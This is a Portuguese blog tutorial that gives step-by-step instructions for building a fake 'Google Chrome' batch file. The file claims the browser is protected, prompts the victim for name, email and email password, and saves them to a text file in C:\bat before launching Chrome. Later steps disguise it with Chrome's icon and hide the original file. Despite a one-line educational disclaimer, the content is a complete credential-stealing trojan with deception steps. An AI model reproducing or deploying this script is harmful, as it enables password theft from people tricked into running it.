Criar Arquivo Bat para Salvar Informações em TXT - Em 12 Passos

Nesse procedimento abordaremos uma questão de segurança das informações muito relevante quando citamos a importância de confiar ou não em preencher Formulários (Forms) e Cadastros que nos são solicitados constantemente a fim de obter um registro no sistema, uma conta de usuário, um acesso ao internet banking, enfim, podemos ser enganados por arquivos maliciosos como a exemplo o keylogger, se o solicitante das informações for fake.

Saiba como gerar arquivo .bat para salvar em .txt informações que servirão para coletar qualquer tipo de informação e executar qualquer programa , desde que saiba alterar os textos e comandos que compõem o arquivo.

Lembrando que precisamos ter cautela ao usar arquivos e apps desse nível. Usemos com o intuito de aprendizado. Saiba que coletar informações de forma ilícita é crime!

O teste a seguir foi feito utilizando o Google Chrome como App a ser aberto após o usuário ser induzido a digitar seu nome, e-mail e senha.

1º Passo

Abrir o Notepad. (Bloco de Notas) pelo Comando Executar



2º Passo

Digite Notepad na janela do Comando Executar e clique em OK

3º Passo

Digite o seguinte comando abaixo. Você poderá estar clicando nesse link para abrir o arquivo salvo em .txt no Google Drive.



@echo off

title Google Chrome

cls
echo.
echo -- O navegador  Google Chrome esta protegido

echo.

echo -- Necessita entrar com seu e-mail e senha!
echo.
echo -- pois este computador esta protegido.
echo.

set /p nome=Nome:
set /p us=Email:
set /p pass=Email Password:




msg * Obrigado agora você já pode usar o Google Chrome.
start chrome.exe
echo dia %date% Hora %time%  %n% logon no email: %us% Nome: %nome% e password:%pass%    >"c:\bat\%n%.txt"
ping locallhost -n 2 >nul

exit


4º Passo

Em seguida, clique em Arquivo e na sequência, Salvar como...


5º Passo

Salve o arquivo com o nome: Google Chrome.bat e escolha a área de trabalho (desktop) como local a ser salvo.

6º Passo

Crie um atalho do arquivo e altere o ícone escolhendo o ícone do navegador Google Chrome.

7º Passo

Clique com o botão direito (menu) do mouse sobre o arquivo e clique em Criar atalho, em seguida, clique com o botão direito sobre o Atalho e selecione a opção Propriedades.


8º Passo

Clique na Aba Atalho da Janela "Propriedades de Google Chrome - Atalho" e clique em Alterar Ícone e em seguida clique em Ok na janela de Aviso que aparecerá.


9º Passo

Clique no botão Procurar e procure pelo seguinte caminho:

C:\Program Files (x86)\Google\Chrome\Application\chrome

10º Passo

Dê um duplo clique no arquivo chrome e na sequência abrirá uma janela com vários ícones do Google Chrome, escolha um de sua preferência e clique em Ok e na seguida Ok para concluir a alteração do ícone do atalho.


11º Passo

Oculte o arquivo principal com o ícone de engrenagem. Poderá estar recortando e colando na unidade C:/, na sequência clique em Continuar na janela "Acesso Negado à Pasta de Destino" e o arquivo será transferido para a unidade C:




 12º Passo

Crie uma pasta na própria unidade C: com o nome bat (Essa pasta é o local que será criado o arquivo txt com as informações registradas por quem acessar o arquivo gerado na área de trabalho.

Faça um teste!

Após fazer o teste, abra a pasta bat criada em C: e localize arquivo.

Observação:

Todas as vezes que o usuário acessar o arquivo e reenviar as informações solicitadas, o novo envio substituirá o antigo e assim sucessivamente.

Até a próxima!


SHARE

Sobre o Autor... Leandro

    Blogger Comment
    Facebook Comment

0 comentários: